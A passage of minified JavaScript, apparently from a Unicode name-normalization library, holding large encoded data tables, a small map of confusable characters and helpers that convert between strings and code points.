Zz+85kD59q99U5R4B3vuI9WenCWqroy2U2Ruq6I+di5N/v9SmYnqJ5H1HLWCbIg6iVrn3s2gFBVFhrc1zzNqoFe275K3Jy1T0Mc5yeE1iRwO2b1L/j/S8jyvGDz6B3NMFEHErGHMM2+oJ5LobazyWEitdgMjQnsd0cjYrCqRpx8idpfwRq6hz/LleX6obpuJh/AGIu4sxD35hwkIEr5ShH8xro7tTDYK1GPHGylK6rp7NCG0lMr7YqwziMUBwXv0zPW667f3/IRLJRD7mkuwUP6mpkxyVjNlcBiAX12r//+WTuzWxsue7bsjRp7xFjpR2tRLqGHLvjYt3TpeybR82K61iLn+pOSWDfUv/HU8ecBtML+Gbz0v9vmlxSgZeBBzbGeP1KSqsH14ZM2kibgDhbS21hIALSOYFCE9LY+2CNvtzT2QuSJMiKP3zwvvs+/JkDwTg0jHVE0XH//U0nu5HKQtCL2KGDQYUgT7qIMVN/OoWqEz1oeG4wG7InZg47NE7rfHB2i7rkpYCUzaPfVtDYgTEPNpa8gXHI2Pp8A6YB8OYHkXDZMMcOL3rJD0Hxk+mRlsSJ12/7T52IcFst5zRc7uDJtQTXBdm9GvsvyXcBbMfKXWqsDSeEnFyPUXZGTafti4a0it8SN1qXxzBmzj+gVZ/FojNy+x73AuuqtJ/oaMZF6m5kbW6ItpfnUT/BrQunS+gLjTTUz0d8jTMpAfFQ40RQi9uM5qdFYzqk85hqSH1zsPOhiO5CN+hNZvL/RIs7m7LyLDuV80ZtyHHqVEngTVPBctHQhmcPjM30m1veDmHCXEpjybWAbgj3TqLUPNazzdHgxYmNuT7trWFcGOi7iTeL5YeK2yp2H98yoLN+skqhffZI/5n/ivceo44wJRY8bzC6DGwdgkMOulYhzW5m6OKyK2Mg+E3YE19L8ngE08TdAuNu0mIzd6kw0i03zzm4oqfVSZjZyxXnBhvt0v89EmnArya/UvHQrdQxBDAJagK2y+OqgBqzQ4FnUeiKfb7HFoUvFSknWhwq58TpBlVRZ0B0A7QWz7X4GLHcbdh5kFI/PKJ91OEh/kmnMEdh+Z23myFH8sXjR/KaHttrpz80N+bl0HM17RX48UjUWslrYHYW7oiHVgcGqTBoTrqK4JYwTTArFO1/APJ8DnEYf+wD92Dw15a9wrPxyJA88yYcv9RypzXLKAWmMuE0KAtIGjfKx1GbRQIq0AkttuRpBO7p4SGrTZuAOat3hTxXEcIKh3HgC1d88K7bz1+Jsi+y7tL/7zc0ZxCBB3hSxvP90GkUp1Lm2wuESafZyFy4Opir+o3gMWtDSuLF3LRHXTUGkKQtvARnwam8BuKv8Q2fHH/cEwPCQd3dhzgri8eTezRsQoGz6ha+S4E7ZzDB/LXwl04vA70NeVsf5rmv1TLvcQSNIBk3U6Qh6Bm+0905B91hopTLnTJRWZkUmbckEw0woG81azyw6LZaBL5Qx2HPvd3LHGLpN6mPZlto50NwW2zFOkgoPKV1gr142teD9aok2HNkPMepl3NIi78ShnAlJCzjZplteUoqz0+iUEOym1LZGGFHMBkc6/5f+sRCCFZZW6KrEby64o/ZfefQAPP6b5ko2fuujIv7uonIKXN6XiJsZmcOeGxteQ+b/ope3Z1HFeXYoW1AJrU/OiCpsyQP1Pr1BdQKFzS0oYnLCAweSnIh7qMFMRBMY7BcnJ5oskUbbRNiosqMzCYUAZPbo8tjCCsCBm5SoGcTHBMXcE+yQpl/OfBkcTw3oa4X7V+ohEh/Zkcv0cqc8sY40IsOW6lLiIrvYND/exZbRlOMgaHvb/QQKaY0k6Aamee2o3LVARCbIP4RoSd7u3CXkG+Iz6iFLfsN38F9xU4n3ueeVgiRs3jw70SMWu1QzDdiLsKtU1qvaLhv7dUbnLimdqYG+pa2aRZ8A6Q9JSr3yTs1MiAvfFHPQJTiqpI/hVUMmL6gPj6eL7lH0IkLCNcaogBA0TGfO0wO6ddf8Fju0L3YbRrWe8J3IewsNBCbpC2b6etQRJnSGLuWDiFoBez9hJHw6+bMQQGQS8YV/kzQ5AFHEqPaMgOjyR5zaHtlOBI4mjo8gdNItHUHQ7Bzq/E/xV1B+L0uoRcLIEj4hcv0yWQTwWLHzoFrvEZPygABpc4rnVjhfcBw5wOvaVVtgiG5qjklrTY1ZaXHkasyVYBd+lgo6zEHMumfK8XR2eD0cVn5w8l1uxGz2ACwtFob/CTV/TUx1kCKp+QROanLrNBiSPTxAf1eOFE+JifgAJ+pyrFqS/0wKlPWUVKlB2Bhu1Ggx2cvfdiR49VIsgBNnE75pf5lpFaQuz8+VPreUd/HLlW8kDSr25AnETsVRrOycLBPYD9/j/7Z0KKdOjtrM71AT+VsjD3D97aUDP5WrHp1DWghsk/lS/hp2VMwo0eqoEerLL/4/SlmyjStwWVDqF6jHC89niCwr1tMSe8GxeC9wjzMKmE7ZtdHOWqqc1OoTI24eVQc++crbyxSU4TxiB+vWoaAUpYQxZ06KKIPq6EvN/rN4DZ0/tQWYVqZ3FTIftPBfIuOWX3PonIKTUArpSvfmQRpkWD00wc3AQS98i4ZYaUbI+DGv90tuEKRjb2ocfdddC21YGUATYQmzelz7JqWBAQqKrWYdWEJlfPeRFZHtUm2MaISZsoOvURowxJKveGRegmBiKZ3d1cMFioJL33RoIKT0eDeK8FH/ybAhZU5TQIsWYmjyeT7EOLL5xZuRPf4qRIo6bbLtFOV6SX60fR8Smys/u1D5DjkmHJyr/woVAvBP2dxGo9gH1LgIm8XlFF1KSYvfj+0w7aTEfoFpcO+Jv3Ssbv8wwkED5JEC+jdln2dzToPNRtWiPbRb8f8G4aZX1j/2Vdbu7jM3gAVD5BKR+yJaOwLtwJodwjWu5di47tnNs9ahpnCUzVMObQfbTqMNs64MGANlgyihKjhwZ6p1Jsnro0/SfkOk6wx+HgUB6Mz9cUiF7KrJkhxnOVjCCcqPZglIojIRoDtkd2AkLNZC88GdP2qZV/1N6PBAe+fpgWZ36oHnewQ8CHdXcxbwQVjOn8U3qD9+e7FzWpg135vgdEMZ9fH5agDnNzdjKFZQ4tDsJs/S6Lk8FqjFJpHMjaRU6FI/DBDM0g+RRkxNoUvm14JAn5dgd6aVHt1aMkSXiJVenbm2FfrIEaFKHtm1erv1BJ5056ULL8AMGLmHav4yxg6F6n5oBq7bdP6zEr6f+QTDJ/KE1XfoG24JvVk2GL7Fb+me27otVFnq1e/2wEuqv6X+2zLQuJQszy5YJi/M5888fMy34L6z8ykD5sCHgzliAoAtEeoaFmnPT63kOYrZWspxYzqQBu/QKNyQ8e4QwKJUCVazmIUp6/zpLA3bWH2ch7QZN0rzWGxMRl3K1osWeETxL95TZSG/atM8LB9B92/71+g9UGWDPfD+lu/KdOQ85rocuHe91/gHA/iprG9PZ2juX49kaRxZ+1/sB3Ck35eWYBFsmCl0wC4QZWX5c5QMuSAEz1CJj0JWArSReV4D/vrgLw+EyhBB6aA4+B34PdlDaTLpm9q9Pkl+bzVWrSO+7uVrIECzsvk8RcmfmNSJretRcoI7ZcIfAqwciU9nJ8O4u1EgkcMOzC/MM2l6OYZRrGcqXCitp4LPXruVPzeD402JGV9grZyz9wJolMLC/YCcWs9CjiWv+DNRLaoSgD5M8T4PzmG8cXYM4jPo5SG1wY3QK/4wzVPrc33wI+AcGI//yXgvyBjocGrl768DMaYCGglwIit4r6t6ulwhwHJ4KeV3VHjspXXG4DIlDR2HNFvPaqkBViIvr433qZPuUINp6oi1LyVVC+EE1j6+wab8uPMeAo6e9uWYequvZynhnYazrvrDQJVkK3KZRoSR5BHi6vOC+AVCujMiQ1GVzGDZ4RFv8jFm7z5CU0iPH2JeXqUzqaKKP4P7osPkcIL99Y7fP3l+TzeFXO2kSpLIJW51oEY8DRIhqexGnxj0nmtGOseStuViIE2mJge45LENf77xjuI7egRNpzthNiajnuqikg0aQS1JqlIZf+hwSUlOp8BEQ0y3xiTOJkohBP3eyYiPDlZpFY88EWOpp4+hC/tQdhrQ56h2VJ2XA6vhPAbj+wH6iA2XYuTvRV25N8wNPQuA0Vzzem2ADZPFK2vr8l0I3GTV3fUN4S6FFYygW2Pu98f+lsgPf67rwVCbgMFAACW3P10GbxnK3SNuNK+VlPRiL7U3dK1o3spH/MFfDkgXuXjxDTxJrYctqHdwUg4rhUCNA13lGjuhJDatpFb/mExsBWS46aLFtROqVm8xQNPXK6A2rRfazJSWpIyh+FMmorXPXYnHQ7YLOmD4B5QTI8rzp7OomiarnaFs5syYjQ0ucc7g1/JzT446IFlDtpUL7DP9bLRCLJryUvi5R71/qX7ycqRSwunQ7+tfJz44Na3aJNszaMEZ/BV4iOGopabYdmvAPe+kIdGCNq5Q8fg8Ld0VNNXV0ZiiGej7zSA+pexy6wKC5k4rZa0k+qaN8bKq3oJWMQCSGaK7PrwMvA8t8BZTzjDqXcFTAIeRtl0SdlGSuAziVXItFcgAkeqwuNsbsrUZFcU6KUZLmvG415kHa0AwMFW2cNSUvPR0U9iCPh0nyslT92B5slYXiDWeSXvxHXItvjI8z5KCIVTIHqGZsbDBTr7WdHzcUAI1ipR86H3o0p2wPhfp7xg9oWOxWIK4a5BWdaV9OAPc0XuvlbwitCVtZDzZxGhIOl77ZgrRYR7LZQFE+Ih23hW3gI914ekkjgbKCi2bsqSAvij6GGj5p+k6evQtJp3qVh9vg+jiJvFCGcKBCITMWpqHZNKfE6IT0dKntS0rhu0DB5D9qIS0/RboNLsx2DlRMlx1QIBeBpHJNKdCL9uWM9eS7RJXKNOpraULtutuJYOl0apdE4LxfsyRSZb6fJkd51SHrI7lLB4vEg4fifJ1dqcWSeY4DgcyjrUcymK+gd3o+qj+3gHKWlLVdMUr3IeF8aClYBq+eeCV9Y7n1Ye8yL7rEvxY7jAlLwucKQ51pu59N8we8XwrbXPChBHXP4LnD3kDwQ85w1DKghtwvpO609fZOrPq8Q7GOOAjHhfR5VqvpoFne8oMHbCrWb1L0IdATo+h1PFeLLI8wc+FEyftLvskCdOtxKfAx3IEJXzBfWTKq5viKP/uu99dxnEpoNJhRtjSZGwOTWr7Ys44++P58O+nkYxd1Gcqm8G3Gh7AHSCxiPNyJWijI/lECrKrAXgBqkRShvdkd7IfoqUlziFDiglx+jdHnmRVmGnk3p/3n78M/HkzFUGZOS07cPnPn9jAnBWl4qDrB1ECf9idIKOdkJTKcZ690nuLW2yDsqwNpgrlT+wx2gv+Engha74lfVqbwqS15FRwuFDfq3bVCZcPy78TL2pH/DOdHeL9MFAtyybQNwHaO781rnJZAhR4M+AYWoSoa0EjQ99xivreM+FKwd7Jp/FC2vvvcq1z3RnRau/BM5KGkBPBSUBOzTNdfaJS/PWTDb1jRSgn2MuY3pVZbY9peHBVI3Ce/u70hg4f7MCVeAjYJfzTkDVLuB6jyjZs5Kko3u39ozgLK4LuwSbUrNIU5cl6Bs3De62AE084XRsm64Gs5W1ofxsWIZ9cYl8PNa5zQHl9ls5aiIKN0rHIIzBnLr03Kle2qq+n/gLDAzvF89vdZCvUFEHRoi9n33O3i49UWyeHP+ZAeRf+psM867nfqON092zE4Pj7AbLtvIUFJFr1y9Le0CL2flc7LUqbgGzOw4/q3vA/cJO5JeI8S+8bc1Y7pqYSzoEWSFn5G7EoPHTGHPMU6SeLKEeli+i8dHY3lWxSrIOU2y0TNo1SeRYewhVx05OXeVDf0xhHNckqp0arRk+bgToeSaHbVZ5nj3IH3m2oayt3sXY78qSPcDpc/5C7VXDRj6bROvvBG5JCsKl/yeMPAUn1flMsmr/FaFdb7gVUXnhLa+/Ilj87PpCC6rILQ6wkIP1ywEg0PztSEzbsJoRwQzDaxkiTN27YDnsy/YKfe6jKcqZWs64skzUAHIt+nXxju0dUVtbCSDAUXYw78Yd4bJKuYU8gbzLzgL4XIUC2HcPIVCUYvM7cybOBFVBdeGR4cOVB7QbGnohTRpiPrGqi1a8QXFBYqENawROuR43OG8dl+Jx4TpwAoi2kkPXW7b/ARSs4DO/z4H6oTIUpN3+/K6Iuc49C4/Uf1NxQTEE91VP8RnLKTpxjywMe2VxM1l4YGXSFY80HUAKIdqczBnnLMPklFV8mrr5hFDypn5TAT00ruU6AjDPNvncoVzX4ac6wAzTwrNH7oz1XLH1wzjQs5k7hcNLbznXQGB7M+rXxKtZXPrz1Ar+OxYGDkJvElknZsHD/IcxRd7ujmmLYpDDbverynroCnSKVQWEGjHL57PaI/WokvhYRpPMk4ni2EUhjDuIF+IU2R0fs40i+66bw8sz8OzyC2eFAxxicd2n5Juta2eWa9KtObD7xLmPvtK+8cjQt+NLjcZCTt+Ss9p1od0bklVgaIV1qJbWxUOr6iUzLDzFefYxAtyRcBr53IaDB25n60KQdhroQWMUpuWSUpELSFxiu4vgQeRoEZe78/ua3TlrszB8sLVZoecnV9YMYz+HkZA/pLqbFhzurB52Wl/WEM6sVk4q04OnzWZFi76JkcGgeeUyYUIwhCDMdIfTUdD4wQpYm3LBw0sp33CVK2q305jeyzgGnBzSMXjesm4XjcEhhrjPSLtwqqoaFCqD5DlHYhoTVafWtBUQXoNfDk19IFxq8sImCcqgMhOToIZUO2530aasY908dMX2nTMFjgv+lapdI8k/e0a7pFw6X3Tgf0m99bbCpOzVgRu2Dw/13CehVfFj+8BeKP6SZV4g/qiX42NWP568PzMajFm2ANmKtHjEIAIc2hc1iecBR9elGP4LmAQwAVmZT8kWc7JSY0ag583ch/Z16krGrjn2YdIaa22egy4/niU6m0WAG3K/yP65cfL//CP+JzcnoLHQFb/KJQeBrEbR1/IKo+YOFXWIQ8ghNxYdMwa49NeXzFqFOIXTmk3w/v5KneS8sGHiPGACh0DE9a1uLAochB79g3IqYObhlswemMucZnAE7dBkp5OAfToa5gHFbIPcec0fVWEOOLftQXsuffyv3wo1LWDDm+SyNMWgSEWtjMyYkjLjTkUtmj7DQlfbpHf38lDvoEN9d2ALxnWCjph4jvfEIRbHvltKbvE2BiYlz45mnJPeFrwZcBny3k0/pyXNrSbEIWvvZw14Y0Fqy4tba1Fu0yNNYaf47jfnz7VCCxKsrJz5oz3F8jXUdQqFu+gDq6EzvKDipXf/3NmcsCC74VB3OgHPgN7W9cU54pjGFDMfifl3m5Vhy21uk1U2nYCrddrifkpwGLYmLSSQAAjC6M3yB1fc6KHpgDnMXh2bYX2ns+Qma+DBgyCkZ0TqZK8Mp2Sryx7HdMM74X9hrwYhQbwlK+zgATAXRzQyS+hK4OTnP17/cyJ2WzY6DChYWGJYXGCnEdMswF5VTYQdSyTpdLXYuh+x2Qr7DR3H2x+YdP0qsLAzYJIWKwrrKkpBgWCmgNCn5t+QbWqf/LoLuvjgDFLtMoxNK5axIA9kammelvwh5ZI52ktrEm/OVEESPQPZGHAIhP7oWDBnGnuzG45XOTpZWsxwNO4UiyxH8riTvQq4JVq5GwX3yqVCbSR0ef/gVYDgiYaiD2EAAxuEPKyXTp/HhL96eVTpaDqFEoV2x1PP/UMcs/XqeGc1gZQG1ot6YxaIEWHanYavH9YdLFjlyU5yrYALVg/sxBjT39oD+BIXvf4LTbvvvpX3srxckEX1XAM9s2uajUTlpPq32mcx4T+sibdQEHQV2WmgwMhbYovh7WWTPfLF03ZbV5a+ElsSIyH6kgJ8+D6aN/6f+ZstkZOYZYx9GbagcrEqwNblz0iZ9NTyvIAeNn3Oup7rtyD4wVE0PoqcnR/LoSK1s1esmOGPjs3zHB8xW4iL8IrhqAJfsWNBYW9TGR11C3KZJaN7MP4O5Ykmpvw94hHzVmsYA68RQdFYfPlFOgCNBoSdy5ODcv11l9bLs135M4okEc4/e8hQczcz2PWipIVSBxa/5sr9xyTFbjG4xm8f4LmrAhD1uEDGrFDl/6X7Nw7/WZPW7fZJGYN8eZ68Td5KGfJyKjD+pTysvTi+8Q8R0L9wKAxAUrYswdvAuiNeenxSplQZjYTxbcH/wP97fOY215SozY3UDRhv7lomztURB2O2UriTX3oAiTKoInkHQietZyhBQ9wMTVHgMrxOP5T/0gN14eFTz0m2D6/iJMbXYGHdIkKEGV2Voa8k/hVNvAVAZKrDEXthUxotwYkYysTDk8j27XEVy+4a30jopuAp5+/xWYb0ne6lwKZwR3j6kDXroOOtrHqWlkJHSWLoPEQJQo/ARzR8UBZSckmeBPn3gJwY62Zo2dyy1AyRRDQBFAJKH9KX+7auP8U8XDo7mMSzq5ZxmaJ5bLpNg4ZM7938SAjMHcu1yB4+lkHnVLnIp86AOPgigH+ZFDRq1QuKWK3pK5JkLDJdakj176NCbjXDASt1h/t1p+GHyKbAoevHSnHuPfoBmQ3nJrDjOhPfwVYi8V5r0KB8BsrfFu8BvhYCbNrvCVnd4Q8RktqIR/ZilioC6g3++L7PHzuXa8NFSF5zd+ISzGLTjrfaKXsBFCkkK0ksSDbl91yXUghMFOskQBeUoo7o3wuIsE29goRIORuJ4b1jSumvR0gR8B21iyW1G4FqHkZOlWz9zq5FnaJX1WbeAxe2DfGSAnw4cqDwg3LFalk6eH89Sdc41Fr6voEa0hfwdkb54yOM7WevDugT1FRzEqdg9zZZ44ZAKGH3ZyqFve3SE4UDN6tLmIFTdIwMrtYRXWBQDB7vvqOuYj7cN31av64+jg/g1uce+am3TOl0cUUL6s0l35FJ9p8vJcG+G8lAFqC0pdmd/aaWYpqDLvB5LEasLMgbPN2N+Wvkh6HYxPOrZEfoxQX/67AzcWOR0K3eYGOgQhyWL7cwKGlxmY/E2b8CKi6Ssgok+7B+zTtq/DXmaDAHRnwbwvCDJ9pITO5RQgBuprEWT0avZv7QjbzITYD8Fzgy4TSYG3z9tLso0Z7MfgHDLKU+kHrzxWkBPwJRydKMXG4AaCA7mlAmjzpNhGOrMGZGZlHSjPbmO5jPd/lKBrViZ0BaXMmqaFOwA/f03O04qQX6MSVA37+SA5Pne/KP7caLJKuOCJXoXpzArUrYesMVc/RXnOv03YrwKgPlR2SjpqIycyulmodZBy6gVc1jA9y6lJqWgR6SY6tc24sVcYuh2GaTeikYJnhr2d6BiL3oLx8M8wuJBdI3FRVIIAx4XougScOw2xWgwUoSYKeLUHc310kVBzSE/vFeHAjlUil8KZftctMgwGjwrhMbjDbK4rB32fTe9jnsqijdp5kOwkD9+klel+lNh3joAFQ");
                const f = new Map([
                    [
                        8217,
                        "apostrophe"
                    ],
                    [
                        8260,
                        "fraction slash"
                    ],
                    [
                        12539,
                        "middle dot"
                    ]
                ]);
                function p(e) {
                    return `{${function(e) {
                        return e.toString(16).toUpperCase().padStart(2, "0");
                    }(e)}}`;
                }
                function m(e) {
                    let t = [];
                    for(let r = 0, n = e.length; r < n;){
                        let n = e.codePointAt(r);
                        r += n < 65536 ? 1 : 2, t.push(n);
                    }
                    return t;
                }
                function g(e) {
                    let t = e.length;
                    if (t < 4096) return String.fromCodePoint(...e);
                    let r = [];
                    for(let n = 0; n < t;)r.push(String.fromCodePoint(...e.slice(n, n += 4096)));
                    return r.join("");
                }
                function y(e, t) {
                    let r = e.length, n = r - t.length;
                    for(let i = 0; 0 == n && i < r; i++)n = e[i] - t[i];
                    return n;
                }
                var v = r("AEUDTAHBCFQATQDRADAAcgAgADQAFAAsABQAHwAOACQADQARAAoAFwAHABIACAAPAAUACwAFAAwABAAQAAMABwAEAAoABQAIAAIACgABAAQAFAALAAIACwABAAIAAQAHAAMAAwAEAAsADAAMAAwACgANAA0AAwAKAAkABAAdAAYAZwDSAdsDJgC0CkMB8xhZAqfoC190UGcThgBurwf7PT09Pb09AjgJum8OjDllxHYUKXAPxzq6tABAxgK8ysUvWAgMPT09PT09PSs6LT2HcgWXWwFLoSMEEEl5RFVMKvO0XQ8ExDdJMnIgsj26PTQyy8FfEQ8AY8IPAGcEbwRwBHEEcgRzBHQEdQR2BHcEeAR6BHsEfAR+BIAEgfndBQoBYgULAWIFDAFiBNcE2ATZBRAFEQUvBdALFAsVDPcNBw13DYcOMA4xDjMB4BllHI0B2grbAMDpHLkQ7QHVAPRNQQFnGRUEg0yEB2uaJF8AJpIBpob5AERSMAKNoAXqaQLUBMCzEiACnwRZEkkVsS7tANAsBG0RuAQLEPABv9HICTUBXigPZwRBApMDOwAamhtaABqEAY8KvKx3LQ4ArAB8UhwEBAVSagD8AEFZADkBIadVj2UMUgx5Il4ANQC9AxIB1BlbEPMAs30CGxlXAhwZKQIECBc6EbsCoxngzv7UzRQA8M0BawL6ZwkN7wABAD33OQRcsgLJCjMCjqUChtw/km+NAsXPAoP2BT84PwURAK0RAvptb6cApQS/OMMey5HJS84UdxpxTPkCogVFITaTOwERAK5pAvkNBOVyA7q3BKlOJSALAgUIBRcEdASpBXqzABXFSWZOawLCOqw//AolCZdvv3dSBkEQGyelEPcMMwG1ATsN7UvYBPEGOwTJH30ZGQ/NlZwIpS3dDO0m4y6hgFoj9SqDBe1L9DzdC01RaA9ZC2UJ4zpjgU4DIQENIosK3Q05CG0Q8wrJaw3lEUUHOQPVSZoApQcBCxEdNRW1JhBirAsJOXcG+xr2C48mrxMpevwF0xohBk0BKRr/AM8u54WwWjFcHE9fBgMLJSPHFKhQIA0lQLd4SBobBxUlqQKRQ3BKh1E2HpMh9jw9DWYuE1F8B/U8BRlPC4E8nkarRQ4R0j6NPUgiSUwsBDV/LC8niwnPD4UMuXxyAVkJIQmxDHETMREXN8UIOQcZLZckJxUIIUaVYJoE958D8xPRAwsFPwlBBxMDtRwtEy4VKQUNgSTXAvM21S6zAo9WgAEXBcsPJR/fEFBH4A7pCJsCZQODJesALRUhABcimwhDYwBfj9hTBS7LCMdqbCN0A2cU52ERcweRDlcHpxwzFb8c4XDIXguGCCijrwlbAXUJmQFfBOMICTVbjKAgQWdTi1gYmyBhQT9d/AIxDGUVn0S9h3gCiw9rEhsBNQFzBzkNAQJ3Ee0RaxCVCOuGBDW1M/g6JQRPIYMgEQonA09szgsnJvkM+GkBoxJiAww0PXfuZ6tgtiQX/QcZMsVBYCHxC5JPzQycGsEYQlQuGeQHvwPzGvMn6kFXBf8DowMTOk0z7gS9C2kIiwk/AEkOoxcH1xhqCnGM0AExiwG3mQNXkYMCb48GNwcLAGcLhwV55QAdAqcIowAFAM8DVwA5Aq0HnQAZAIVBAT0DJy8BIeUCjwOTCDHLAZUvAfMpBBvDDBUA9zduSgLDsQKAamaiBd1YAo4CSTUBTSUEBU5HUQOvceEA2wBLBhPfRwEVq0rLGuNDAd9vKwDHAPsABTUHBUEBzQHzbQC3AV8LMQmis7UBTekpAIMAFWsB1wKJAN0ANQB/8QFTAE0FWfkF0wJPSQERMRgrV2EBuwMfATMBDQB5BsuNpckHHwRtB9MCEBsV4QLvLge1AQMi3xPNQsUCvd5VoWACZIECYkJbTa9bNyACofcCaJgCZgkCn4Q4GwsCZjsCZiYEbgR/A38TA36SOQY5dxc5gjojIwJsHQIyNjgKAm3HAm2u74ozZ0UrAWcA3gDhAEoFB5gMjQD+C8IADbUCdy8CdqI/AnlLQwJ4uh1c20WuRtcCfD8CesgCfQkCfPAFWQUgSABIfWMkAoFtAoAAAoAFAn+uSVhKWxUXSswC0QEC0MxLJwOITwOH5kTFkTIC8qFdAwMDrkvOTC0lA89NTE2vAos/AorYwRsHHUNnBbcCjjcCjlxAl4ECjtkCjlx4UbRTNQpS1FSFApP7ApMMAOkAHFUeVa9V0AYsGymVhjLheGZFOzkCl58C77JYIagAWSUClo8ClnycAKlZrFoJgU0AOwKWtQKWTlxEXNECmcsCmWRcyl0HGQKcmznCOp0CnBYCn5sCnriKAB0PMSoPAp3xAp6SALU9YTRh7wKe0wKgbgGpAp6fHwKeTqVjyGQnJSsCJ68CJn4CoPsCoEwCot0CocQCpi8Cpc4Cp/8AfQKn8mh8aLEAA0lqHGrRAqzjAqyuAq1nAq0CAlcdAlXcArHh1wMfTmyXArK9DQKy6Bds4G1jbUhfAyXNArZcOz9ukAMpRQK4XgK5RxUCuSp3cDZw4QK9GQK72nCWAzIRAr6IcgIDM3ECvhpzInNPAsPLAsMEc4J0SzVFdOADPKcDPJoDPb8CxXwCxkcCxhCJAshpUQLIRALJTwLJLgJknQLd0nh5YXiueSVL0AMYo2cCAmH0GfOVJHsLXpJeuxECz2sCz2wvS1PS8xOfAMatAs9zASnqA04SfksFAtwnAtuKAtJPA1JcA1NfAQEDVYyAiT8AyxbtYEWCHILTgs6DjQLaxwLZ3oQQhEmnPAOGpQAvA2QOhnFZ+QBVAt9lAt64c3cC4i/tFAHzMCcB9JsB8tKHAuvzAulweQLq+QLq5AD5RwG5Au6JAuuclqqXAwLuPwOF4Jh5cOBxoQLzAwBpA44WmZMC9xMDkW4DkocC95gC+dkC+GaaHJqruzebHgOdgwL++gEbADmfHJ+zAwWNA6ZqA6bZANHFAwZqoYiiBQkDDEkCwAA/AwDhQRdTARHzA2sHl2cFAJMtK7evvdsBiZkUfxEEOQH7KQUhDp0JnwCS/SlXxQL3AZ0AtwW5AG8LbUEuFCaNLgFDAYD8AbUmAHUDDgRtACwCFgyhAAAKAj0CagPdA34EkQEgRQUhfAoABQBEABMANhICdwEABdUDa+8KxQIA9wqfJ7+xt+UBkSFBQgHpFH8RNMCJAAQAGwBaAkUChIsABjpTOpSNbQC4Oo860ACNOME63AClAOgAywE6gTo7Ofw5+Tt2iTpbO56JOm85GAFWATMBbAUvNV01njWtNWY1dTW2NcU1gjWRNdI14TWeNa017jX9NbI1wTYCNhE1xjXVNhY2JzXeNe02LjY9Ni41LSE2OjY9Njw2yTcIBJA8VzY4Nt03IDcPNsogN4k3MAoEsDxnNiQ3GTdsOo03IULUQwdC4EMLHA8PCZsobShRVQYA6X8A6bABFCnXAukBowC9BbcAbwNzBL8MDAMMAQgDAAkKCwsLCQoGBAVVBI/DvwDz9b29kaUCb0QtsRTNLt4eGBcSHAMZFhYZEhYEARAEBUEcQRxBHEEcQRxBHEEaQRxBHEFCSTxBPElISUhBNkM2QTYbNklISVmBVIgBFLWZAu0BhQCjBcEAbykBvwGJAaQcEZ0ePCklMAAhMvAIMAL54gC7Bm8EescjzQMpARQpKgDUABavAj626xQAJP0A3etzuf4NNRA7efy2Z9NQrCnC0OSyANz5BBIbJ5IFDR6miIavYS6tprjjmuKebxm5C74Q225X1pkaYYPb6f1DK4k3xMEBb9S2WMjEibTNWhsRJIA+vwNVEiXTE5iXs/wezV66oFLfp9NZGYW+Gk19J2+bCT6Ye2w6LDYdgzKMUabk595eLBCXANz9HUpWbATq9vqXVx9XDg+Pc9Xp4+bsS005SVM/BJBM4687WUuf+Uj9dEi8aDNaPxtpbDxcG1THTImUMZq4UCaaNYpsVqraNyKLJXDYsFZ/5jl7bLRtO88t7P3xZaAxhb5OdPMXqsSkp1WCieG8jXm1U99+blvLlXzPCS+M93VnJCiK+09LfaSaBAVBomyDgJua8dfUzR7ga34IvR2Nvj+A9heJ6lsl1KG4NkI1032Cnff1m1wof2B9oHJK4bi6JkEdSqeNeiuo6QoZZincoc73/TH9SXF8sCE7XyuYyW8WSgbGFCjPV0ihLKhdPs08Tx82fYAkLLc4I2wdl4apY7GU5lHRFzRWJep7Ww3wbeA3qmd59/86P4xuNaqDpygXt6M85glSBHOCGgJDnt+pN9bK7HApMguX6+06RZNjzVmcZJ+wcUrJ9//bpRNxNuKpNl9uFds+S9tdx7LaM5ZkIrPj6nIU9mnbFtVbs9s/uLgl8MVczAwet+iOEzzBlYW7RCMgE6gyNLeq6+1tIx4dpgZnd0DksJS5f+JNDpwwcPNXaaVspq1fbQajOrJgK0ofKtJ1Ne90L6VO4MOl5S886p7u6xo7OLjG8TGL+HU1JXGJgppg4nNbNJ5nlzSpuPYy21JUEcUA94PoFiZfjZue+QnyQ80ekOuZVkxx4g+cvhJfHgNl4hy1/a6+RKcKlar/J29y//EztlbVPHVUeQ1zX86eQVAjR/M3dA9w4W8LfaXp4EgM85wOWasli837PzVMOnsLzR+k3o75/lRPAJSE1xAKQzEi5v10ke+VBvRt1cwQRMd+U5mLCTGVd6XiZtgBG5cDi0w22GKcVNvHiu5LQbZEDVtz0onn7k5+heuKXVsZtSzilkLRAUmjMXEMB3J9YC50XBxPiz53SC+EhnPl9WsKCv92SM/OFFIMJZYfl0WW8tIO3UxYcwdMAj7FSmgrsZ2aAZO03BOhP1bNNZItyXYQFTpC3SG1VuPDqH9GkiCDmE+JwxyIVSO5siDErAOpEXFgjy6PQtOVDj+s6e1r8heWVvmZnTciuf4EiNZzCAd7SOMhXERIOlsHIMG399i9aLTy3m2hRLZjJVDNLS53iGIK11dPqQt0zBDyg6qc7YqkDm2M5Ve6dCWCaCbTXX2rToaIgz6+zh4lYUi/+6nqcFMAkQJKHYLK0wYk5N9szV6xihDbDDFr45lN1K4aCXBq/FitPSud9gLt5ZVn+ZqGX7cwm2z5EGMgfFpIFyhGGuDPmso6TItTMwny+7uPnLCf4W6goFQFV0oQSsc9VfMmVLcLr6ZetDZbaSFTLqnSO/bIPjA3/zAUoqgGFAEQS4IhuMzEp2I3jJzbzkk/IEmyax+rhZTwd6f+CGtwPixu8IvzACquPWPREu9ZvGkUzpRwvRRuaNN6cr0W1wWits9ICdYJ7ltbgMiSL3sTPeufgNcVqMVWFkCPDH4jG2jA0XcVgQj62Cb29v9f/z/+2KbYvIv/zzjpQAPkliaVDzNrW57TZ/ZOyZD0nlfMmAIBIAGAI0D3k/mdN4xr9v85ZbZbbqfH2jGd5hUqNZWwl5SPfoGmfElmazUIeNL1j/mkF7VNAzTq4jNt8JoQ11NQOcmhprXoxSxfRGJ9LDEOAQ+dmxAQH90iti9e2u/MoeuaGcDTHoC+xsmEeWmxEKefQuIzHbpw5Tc5cEocboAD09oipWQhtTO1wivf/O+DRe2rpl/E9wlrzBorjJsOeG1B/XPW4EaJEFdNlECEZga5ZoGRHXgYouGRuVkm8tDESiEyFNo+3s5M5puSdTyUL2llnINVHEt91XUNW4ewdMgJ4boJfEyt/iY5WXqbA+A2Fkt5Z0lutiWhe9nZIyIUjyXDC3UsaG1t+eNx6z4W/OYoTB7A6x+dNSTOi9AInctbESqm5gvOLww7OWXPrmHwVZasrl4eD113pm+JtT7JVOvnCXqdzzdTRHgJ0PiGTFYW5Gvt9R9LD6Lzfs0v